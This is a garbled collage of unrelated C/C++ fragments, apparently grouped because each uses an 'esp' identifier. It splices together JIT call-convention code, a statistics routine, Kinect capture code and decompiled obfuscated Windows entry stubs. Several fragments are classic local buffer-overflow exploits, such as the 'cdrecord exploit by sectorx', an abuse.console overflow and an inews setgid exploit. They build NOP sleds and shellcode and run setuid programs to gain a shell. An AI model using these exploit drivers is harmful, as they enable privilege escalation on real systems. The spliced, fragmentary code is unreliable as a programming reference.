unsigned Processor::call_thiscall_args(Register* obj, const char* args, va_list ap) {
std::stack<Argument> arg_stack;
std::unordered_set<unsigned char> used_regs;
Register esp(*this, ESP, sizeof(void*) * 8);
unsigned argCount = 0, floatCount = 0, intCount = 0, regCount = 0, stackBytes = 0;
//Set the object as first argument
if(obj) {
if(!isIntArg64Register(intCount, argCount))
stackBytes += pushSize();
++argCount;
++intCount;
arg_stack.push(obj);
}
//Read the arguments in...
while(args && *args != '\0') {
if(*args == 'r') {
Register* reg = va_arg(ap,Register*);
if(reg->xmm()) {
if(!isFloatArg64Register(floatCount, argCount))
stackBytes += pushSize();
++floatCount;
}
else {
if(!isIntArg64Register(intCount, argCount))
stackBytes += pushSize();
++intCount;
}
++regCount;
arg_stack.push(reg);
}
else if(*args == 'm') {
__entry_point__()
{
ecx = ecx & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173;
eax = eax + ecx;
ecx = ecx + edx;
(save)0;
*__imp__GetModuleHandleA();
asm("Unknown opcode 0x0f");
asm("Unknown opcode 0xc6");
asm("hlt");
edx = esp;
for((save)149630669; 1; eax = eax - 149630660) {
(restore)eax;
}
(save)edx;
(save)eax;
asm("rol dword [esp],0x5");
(restore)edx;
asm("bswap edx");
*esp = *esp + edx + -1476385172;
*esp();
asm("adc eax,+0x35");
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*__imp__GetModuleHandleA();
(save)0;
*L20402008();
}
int main(int argc, char *argv[])
{
long addr;
char buf[LENGTH];
char egg[EGGIE];
int i,offset;
printf("cdrecord exploit by sectorx (FreeBSD)\n");
if (argc < 2) {
printf("error: offset must be supplied as a parameter\n");
printf("*note* FreeBSD 3.3-RELEASE\'s offset is 600\n\n");
return;
}
offset = atoi(argv[1]);
addr = esp()+offset;
printf("Using offset 0x%x [%d], eip = 0x%x\n",offset,offset,addr);
/* build the overflow string */
for (i=0;i<LENGTH;i+=4) *(long*)&buf[i] = addr;
buf[LENGTH-1] = '\0';
/* build the egg string */
memset(&egg,0x90,sizeof(egg));
memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn));
egg[EGGIE-1] = '\0';
setenv("EGG",egg,1);
execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0);
}
void bruteforce(char **path)
{
pid_t pid;
int x=0, offset=5;
long ret;
printf("attemping brute force\n\n");
if(!getuid())
{
printf("brute force cannot be run while uid is 0\n");
exit(0);
}
ret=esp()+offset;
while(getuid()&&(x<=3000&&x>=-3000))
{
if((pid=fork())==0)
{
exploit(ret,path);
exit(0);
}
else perror("fork failed");
if(waitpid(pid,NULL, 0)!= pid) perror("waitpid error");
if(x>=3000)
{
ret=esp();
x=-1;
}
else if(x<=3000&&x>=0)
{
ret+=offset;
x+=offset;
}
else if(x>=-3000&&x<0)
{
ret-=offset;
x-=offset;
}
printf("%d\n\n",x);
}
printf("brute force complete..\n\n");
system("id");
}
void run()
{
int i;
for (i = 0; tab[i].believe != NULL; i++)
{
printf("f(x) = %s\n", tab[i].info);
printf("E(x) = %.3f\n", esp(tab[i].believe, tab[i].failboat, tab[i].wincopter));
printf("Var(x) = %.3f\n\n", var(tab[i].believe, tab[i].failboat, tab[i].wincopter));
}
}
void Processor::call_cdecl_end(unsigned argBytes, bool returnPointer) {
Register esp(*this, ESP, sizeof(void*) * 8);
unsigned stackOffset = (stackDepth + argBytes) % 16;
if(stackOffset != 0)
argBytes += (16 - stackOffset);
#ifndef _MSC_VER
if(returnPointer)
argBytes -= 4;
#endif
if(argBytes != 0)
esp += argBytes;
}
main(int argc, char **argv)
{
int i,j,offset;
unsigned long eip;
char buffer[4096];
j=0;
offset=atoi(argv[1]);
eip=esp()+offset;
for(i=0;i<1008;i++) buffer[i]=0x90;
for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++];
i=1005;
buffer[i]=eip & 0xff;
buffer[i+1]=(eip >> 8) & 0xff;
buffer[i+2]=(eip >> 16) & 0xff;
buffer[i+3]=(eip >> 24) & 0xff;
printf("%s\nsh -i\n",buffer);
}
void main(int argc,char *argv[])
{
char cmd[1000];
int i,x;
long retn;
char buff[LEN];
printf("\nUsage :- %s <offset>\n..",argv[0]);
if(argc>1)
retn=esp()-atoi(argv[1]);
else
retn=RET;
printf("Using return Adress :- ",retn );
for(i=0;i<LEN;i+=4)
{
*(long*)&buff[i]=retn;
}
for(i=0;i<(LEN-(strlen(shellcode)+8));i++)
{
*(buff+i)=NOP;
}
memcpy(buff+i,shellcode,strlen(shellcode));
sprintf(cmd,"/usr/lib/games/abuse/abuse.console -net %s",buff);
puts("executing .......");
system(cmd);
return;
}
int main(int argc,char **argv){
char bof[600]; // give or take a few. (528)
int i,offset,gid=NEWSGID;
long ret;
FILE *inewsfile;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
for(i=ALIGN;i<600;i+=4){*(long *)&bof[i]=ret;}
exec[10]=gid;
for(i=0;i<(600-strlen(exec)-100);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
unlink(TMPFILE); // clean house.
inewsfile=fopen(TMPFILE,"w");
fprintf(inewsfile,"From: %s\n",bof); // required, woops.
fprintf(inewsfile,"Newsgroups: %s\n",NEWSGROUP); // required.
fprintf(inewsfile,"Subject: %s\n\n",SUBJECT); // required.
fclose(inewsfile);
printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
if(execlp(PATH,"inews","-h",TMPFILE,0)){
printf("%s: failed, is %s the correct path?\n",argv[0],PATH);
exit(-1);
}
}
int main(int argc, char **argv)
{
int cnt, sel;
char *offset;
long returnaddr;
if(argc == 1)
{
usage((char **)argv[0]);
exit(1);
}
while((cnt = getopt(argc,argv,"t:b:o:")) != EOF)
{
switch(cnt)
{
case 't': //target distro
sel = atoi(optarg);
exploit(target[sel-1].ret,(char **)target[sel-1].path);
break;
case 'b': //brute force
bruteforce((char **)target[sel-1].path);
break;
case 'o': //offset
offset = atoi(optarg);
returnaddr=esp()+offset;
sel = atoi(optarg);
exploit(returnaddr,(char **)target[sel-1].path);
break;
default:
usage(&argv[0]);
break;
}
}
return(0);
}
double var(double (*believe)(), double ko, double ok)
{
double inc;
double h;
double i;
double j;
double m;
i = 0.f;
j = 0.f;
m = esp(believe, ko, ok);
h = (double)((double)(ok - ko) / (double)ITER);
for (inc = 1.f; inc <= (ITER - 1.f); inc += 1.f)
{
i += (((ko + inc * h) - m) * ((ko + inc * h) - m)) * believe(ko + inc * h);
}
i *= 2.f;
for (inc = 0.f; inc <= (ITER - 1.f); inc += 1.f)
{
j += (((ko + inc * h + h / 2.f) - m) * ((ko + inc * h + h / 2.f) - m)) * believe(ko + inc * h + h / 2.f);
}
j *= 4.f;
return (((double)(ok - ko) / (6.f * ITER)) * ((ko - m) * believe(ko) + (ok - m) * believe(ok) + i + j));
}
__entry_point__()
{
eax = eax + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx;
edx = *esp;
asm("Unknown opcode 0x0f");
asm("Unknown opcode 0xc6");
asm("hlt");
for(eax = 132853453; 1; eax = eax - 132853450) {
}
(save)eax;
*esp = *esp - 2;
(restore)eax;
asm("bswap eax");
(save)eax;
*esp = *esp + -50321797;
*esp = *esp + edx;
asm("adc edx,+0x19");
eax = *esp() - 21;
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
*__imp__GetVersion();
ecx = ecx + 1;
}
void Processor::call_cdecl_prep(unsigned argBytes) {
unsigned stackOffset = (stackDepth + argBytes) % 16;
Register esp(*this, ESP, sizeof(void*) * 8);
if(stackOffset != 0)
esp -= 16 - stackOffset;
}
L00411768()
{
asm("aam 0xf0");
*eax = *eax + 1;
cl = 226;
*eax = *eax + 1;
ss = esp;
*eax = *eax + 1;
-1 = esi * eax;
*(eax - 72) = *(eax - 72) + 226;
*eax = *eax + 1;
eax = eax & 65450;
*edi = al;
edi = edi + 1;
*eax = *eax + 1;
*(edx + 2046820572) = *(edx + 2046820572) + dl;
ecx = -1771962368;
*eax = *eax + al;
if(!(edx = edx - 1)) {
}
*edx = *edx + dh;
(save)eax;
ah = ah + dl;
asm("jecxz 0x41179a");
*(ecx + -1912537145) = *(ecx + -1912537145) + dh;
*edi = eax;
edi = edi + 4;
*eax = *eax + 1;
-1 = *(edi + 1934098687) * ecx;
*L0000FF57 = *L0000FF57 + ah;
(save)ebp;
*eax = *eax + 1;
*(ecx - 36) = *(ecx - 36) + cl;
*eax = *eax + al;
eax :: 822083769;
asm("xchg eax,esi");
*eax = *eax + al;
(save)eax;
ah = (eax & 419430515) + dl;
asm("aam 0xff");
*(ecx + -1912537167) = *(ecx + -1912537167) + dh;
asm("Unknown opcode 0x8e");
*eax = *eax + 1;
0 = *(ebx - 1) * ebp;
eax = eax - 1 - 1;
*eax = *eax + 1;
eax = eax & 65317;
bh = bh + bh;
*eax = *eax + al;
ah = ah + bl;
*eax = *eax + al;
*(ecx + -1778384896) = *(ecx + -1778384896) + bh;
*eax = *eax + al;
*ebx = *ebx + dh;
*eax = *eax + al;
(save)eax;
bl = bl + ah;
asm("aam 0xff");
bh = bh + al;
*(ebx + -1895759986) = *(ebx + -1895759986) + 255;
if(!(0 = edi * edi)) {
*eax = *eax + 1;
(save)edi;
eax = eax & 5570815;
*eax = *eax + 1;
ah = ah + bl;
*L3100B900 = *L3100B900 + bh;
*(esi + 1929389312) = *(esi + 1929389312) + dl;
*L000000FE = *L000000FE + bl;
*eax = *eax + dl;
asm("lock aam 0xff");
dl = dl + ah;
cl = 255;
ah = ah + dl;
asm("Unknown opcode 0x8e");
*eax = *eax + 1;
asm("Unknown opcode 0xc6");
0 = edi * edi;
eax = 72;
*L00000048 = *L00000048 + 1;
asm("xchg eax,edx");
ah = ah + bl;
*edx = *edx + bh;
}
if(!( *edx = *edx + -1778359808)) {
}
al = al ^ *eax;
(save)eax;
bh = bh + bh;
asm("aam 0xff");
bh = bh + bh;
cl = 255;
bh = bh + bh;
asm("Unknown opcode 0x8e");
*eax = *eax + 1;
goto ( *(ebx - 1));
bh = bh + bh;
eax = eax - 1;
*eax = *eax + 1;
goto ( *L00ff00ff);
*eax = *eax + 1;
(fsave)(frestore) + *eax + *eax;
ecx = -1778337536;
*(esi + 1929409280) = *(esi + 1929409280) + dl;
*eax = *eax + dl;
(save)eax;
bh = bh + bh;
asm("aam 0xf0");
bh = bh + bh;
ss = esp;
0 = esi * eax;
*(eax - 72) = *(eax - 72) - 1;
bh = bh + bh + bh + bh + bh + bh + bh + bh;
*edi = eax & 16711850;
edi = edi + 1;
ah = ah + bl;
*(edx + 2046867712) = *(edx + 2046867712) + dl;
*(esi + 1929404928) = *(esi + 1929404928) + dl;
*edx = *edx + 226;
(save)eax;
*edx = *edx + dh;
bh = bh + bh;
asm("aam 0xe3");
bh = bh + bh;
cl = 199;
gs = *(bh + bh + -1888747776);
bh = bh + bh + bh + bh;
if(!(eax = eax - 1)) {
}
goto ( *L00ff0057);
(save)ebp;
ah = ah + bl;
*ecx = *ecx + cl;
*L96003D00 = *L96003D00 + dh;
*ebx = *ebx + dh;
eax = eax & 419450880;
bh = bh + bh;
asm("aam 0xd4");
bh = bh + bh;
cl = 177;
bh = bh + bh;
asm("Unknown opcode 0x8e");
es = *eax;
goto ( *(ebx + 107));
bh = bh + bh;
eax = eax - 1 - 1;
bh = bh + bh;
eax = eax & 16711717;
*eax = *eax + al;
(fsave)(frestore) + *eax;
*eax = *eax + al;
ecx = -1778384896;
*eax = *eax + al;
*ebx = *ebx + dh;
*eax = *eax + al;
(save)eax;
*eax = *eax + al;
bh = bh + bh;
asm("jecxz 0x4118ef");
bh = bh + bh;
asm("Unknown opcode 0xc7");
cl = 0;
goto ( *(ebx + -1879113586));
if(!(-1 = *eax * eax)) {
bh = bh + bh;
(save)edi;
ah = (eax & 5635840) + bl;
ecx = ecx - 1;
*eax = *eax + al;
ecx = -1778384835;
*eax = *eax ^ eax;
*(ebx + 37) = *(ebx + 37) + dh;
*eax = *eax + al;
(save)eax;
asm("sbb [eax],eax");
bh = bh + bh;
asm("lock aam 0x0");
goto ( *edx);
cl = 0;
eax = *esp();
es = *eax;
esi = esi + 1;
-1 = *eax * eax;
ah = 11141120 + bl;
asm("xchg eax,edx");
*eax = *eax + al;
ecx = -1778384774;
asm("bound eax,[eax]");
*(ebx + 74) = *(ebx + 74) + dh;
*eax = *eax + al;
}
esp KinectOpenNI::get(const base::timestamp frame)
{
if(!_connected)
{
return esp();
}
// QMutexLocker locker(&_mutex);
g_depth.GetMetaData(g_depthMD);
g_image.GetMetaData(g_imageMD);
cv::Mat rgb;
cv::Mat depth;
const XnDepthPixel* pDepth = g_depth.GetDepthMap();//g_depthMD.Data();
depth.create(480,640,CV_16UC1);
assert((g_depthMD.XRes() == depth.cols) && (g_depthMD.YRes() == depth.rows));
memcpy(depth.data,pDepth,640*480*2);
const XnUInt8* pImage = g_imageMD.Data();
rgb.create(480,640,CV_8UC3);
assert(g_imageMD.PixelFormat() == XN_PIXEL_FORMAT_RGB24);
memcpy(rgb.data,pImage,640*480*3);
XnUInt64 F;
XnDouble pixel_size;
// get the focal length in mm (ZPS = zero plane distance)
g_depth.GetIntProperty ("ZPD", F);
// get the pixel size in mm ("ZPPS" = pixel size at zero plane)
g_depth.GetRealProperty ("ZPPS", pixel_size);
//qDebug() << F << pixel_size;
RgbdKinect *kf = new RgbdKinect(pixel_size,F,_serial,rgb,depth,cv::Point3d(0,0,0));
SEND(types::Rgbd,kf)
/* if(_sendKinectFrame)
{
const XnUInt8* pImage = g_imageMD.Data();
rgb.create(480,640,CV_8UC3);
assert(g_imageMD.PixelFormat() == XN_PIXEL_FORMAT_RGB24);
memcpy(rgb.data,pImage,640*480*3);
if(_send3d)
{
depth = retrievePointCloudAsImage(pDepth);
}else{
depth.create(480,640,CV_16UC1);
memcpy(depth.data,pDepth,640*480*2);
}
types::Rgbd *kf = new types::Rgbd(_serial,rgb,depth,cv::Point3d(0,0,0));
if(_send3d)
{
SEND_TAG(types::Rgbd,kf,"3D")
}else{
SEND(types::Rgbd,kf)
}
}
if(_sendPointCloud)
{
// //qDebug() << "Send pc";
SEND(PointCloud,xnPoint3DToPointCloud(retrievePointCloudMap(pDepth),640*480))
}*/
//xnWaitNoneUpdateAll
// g_context.WaitNoneUpdateAll();
g_context.WaitAndUpdateAll();
return esp();
}
